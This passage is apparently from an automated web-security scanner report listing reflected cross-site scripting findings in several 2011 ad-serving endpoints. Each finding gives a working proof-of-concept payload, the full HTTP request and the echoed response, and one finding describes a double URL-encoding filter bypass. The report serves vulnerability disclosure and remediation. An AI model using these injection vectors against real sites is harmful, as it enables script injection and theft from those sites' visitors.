User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7517

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
yAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1c1b11"-alert(1)-"fc5636c00ac&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B39213496");
var fscUrl = url;
var f
...[SNIP]...

1.45. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ccfa'-alert(1)-'eb4e71ababd was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=12ccfa'-alert(1)-'eb4e71ababd&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
yAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=12ccfa'-alert(1)-'eb4e71ababd&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598\">
...[SNIP]...

1.46. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc24d"-alert(1)-"d0287f2bb97 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtwbc24d"-alert(1)-"d0287f2bb97&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtwbc24d"-alert(1)-"d0287f2bb97&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

1.47. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e728'-alert(1)-'54ab655354d was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw4e728'-alert(1)-'54ab655354d&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw4e728'-alert(1)-'54ab655354d&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598\">
...[SNIP]...

1.48. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17ecf'-alert(1)-'9bd825e5b22 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l17ecf'-alert(1)-'9bd825e5b22&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7517

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1e7/%2a/s%3B233905705%3B0-0%3B0%3B57865904%3B4307-300/250%3B39213496/39231283/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l17ecf'-alert(1)-'9bd825e5b22&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20u
...[SNIP]...

1.49. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70a70"-alert(1)-"52f10523c4a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l70a70"-alert(1)-"52f10523c4a&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7517

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1e7/%2a/s%3B233905705%3B0-0%3B0%3B57865904%3B4307-300/250%3B39213496/39231283/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l70a70"-alert(1)-"52f10523c4a&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20u
...[SNIP]...

1.50. http://ad.yieldmanager.com/v0/admeld-match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /v0/admeld-match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a018%2527%253balert%25281%2529%252f%252f29ac3d5f519 was submitted in the admeld_callback parameter. This input was echoed as 3a018';alert(1)//29ac3d5f519 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the admeld_callback request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /v0/admeld-match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=420&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match3a018%2527%253balert%25281%2529%252f%252f29ac3d5f519 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:53:03 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private
Content-Length: 261
Content-Type: text/javascript
Age: 0
Proxy-Connection: close
Server: YTS/1.18.4

document.write('<img width="0" height="0" src="http://tag.admeld.com/match3a018';alert(1)//29ac3d5f519?admeld_adprovider_id=420&external_user_id=0&expiration=1297968783" /><img width="0" height="0" sr
...[SNIP]...

1.51. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8cd2'%3balert(1)//13a730e6121 was submitted in the admeld_adprovider_id parameter. This input was echoed as b8cd2';alert(1)//13a730e6121 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=78b8cd2'%3balert(1)//13a730e6121&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:53:02 GMT
X-Name: rtb-o06
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=78b8cd2';alert(1)//13a730e6121&external_user_id=0&expiration=1297018382" alt="" />');

1.52. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19652'%3balert(1)//c53cf824e4b was submitted in the admeld_callback parameter. This input was echoed as 19652';alert(1)//c53cf824e4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match19652'%3balert(1)//c53cf824e4b HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:53:03 GMT
X-Name: rtb-o03
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match19652';alert(1)//c53cf824e4b?admeld_adprovider_id=78&external_user_id=0&expiration=1297018383" alt="" />');

1.53. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff5e8'%3balert(1)//fba03bbdfb2 was submitted in the admeld_adprovider_id parameter. This input was echoed as ff5e8';alert(1)//fba03bbdfb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73ff5e8'%3balert(1)//fba03bbdfb2&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001

Response

HTTP/1.1 200 OK
Cache-control: no-cache, no-store
Content-Type: text/plain
Date: Thu, 03 Feb 2011 18:53:30 GMT
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: 2=2r4Mi92x-Y-; Domain=.lucidmedia.com; Expires=Fri, 03-Feb-2012 18:53:31 GMT; Path=/
Set-Cookie: 1609092=00000000001; Domain=.lucidmedia.com; Expires=Fri, 03-Feb-2012 18:53:31 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73ff5e8';alert(1)//fba03bbdfb2&external_user_id=3297869551067506954"/>');

1.54. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2d68'%3balert(1)//7361267a395 was submitted in the admeld_callback parameter. This input was echoed as e2d68';alert(1)//7361267a395 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matche2d68'%3balert(1)//7361267a395 HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001

Response

HTTP/1.1 200 OK
Cache-control: no-cache, no-store
Content-Type: text/plain
Date: Thu, 03 Feb 2011 18:53:42 GMT
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: 2=2r4Mi92x-Y-; Domain=.lucidmedia.com; Expires=Fri, 03-Feb-2012 18:53:42 GMT; Path=/
Set-Cookie: 1609092=00000000001; Domain=.lucidmedia.com; Expires=Fri, 03-Feb-2012 18:53:42 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/matche2d68';alert(1)//7361267a395?admeld_adprovider_id=73&external_user_id=3297869551067506954"/>');

1.55. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 6c86c<script>alert(1)</script>03ede497a81 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341369&pid=8797686c86c<script>alert(1)</script>03ede497a81&ps=-1&zw=320&zh=280&url=http%3A//www.thestreet.com/story/229c029d89d776ed%29%28sn%3D*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html&v=5&dct=Sorry%2C%20the%20page%20you%20requested%20could%20not%20be%20found&ref=http%3A//burp/show/16 HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
